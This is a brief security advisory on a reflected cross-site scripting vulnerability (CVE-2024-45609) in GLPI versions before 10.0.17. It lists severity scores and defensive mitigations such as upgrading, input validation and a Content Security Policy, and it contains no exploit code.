GLPI (DC-2024-45609): Reflected XSS Vulnerability

2024-11-20

:

A reflected Cross-Site Scripting (XSS) vulnerability (CVE-2024-45609) has been identified in GLPI, a popular IT asset management software. This vulnerability allows unauthenticated attackers to inject malicious scripts into reports viewed by GLPI technicians. Attackers can potentially steal sensitive information or deface web content through these scripts.

Vulnerability Details:

Platform: GLPI
Version: All versions before 10.0.17
Vulnerability: Reflected XSS (CVE-2024-45609)
Severity: Medium (CVSS v3.1 score: 6.5) – Though some sources list it as High (CVSS v2 score: 7.8)
Date: November 15, 2024 (published)

Mitigation:

Upgrade to GLPI version 10.0.17 or later.

Implement strict input validation and sanitization on the server-side.
Use Content Security Policy (CSP) to restrict script execution.
Train users to be aware of phishing attempts and avoid clicking on suspicious links.

What Undercode Says:

This XSS vulnerability in GLPI poses a moderate risk to organizations using vulnerable versions. Upgrading to the latest version (10.0.17) is crucial to mitigate the risk. Additionally, implementing security best practices like input validation and user awareness training can further strengthen your defenses.

References:

Reported By: Nvd.nist.gov
Undercode AI: https://ai.undercodetesting.com

Image Source:

OpenAI: https://openai.com
Undercode AI DI v2: https://ai.undercode.helpFeatured Image

Scroll to Top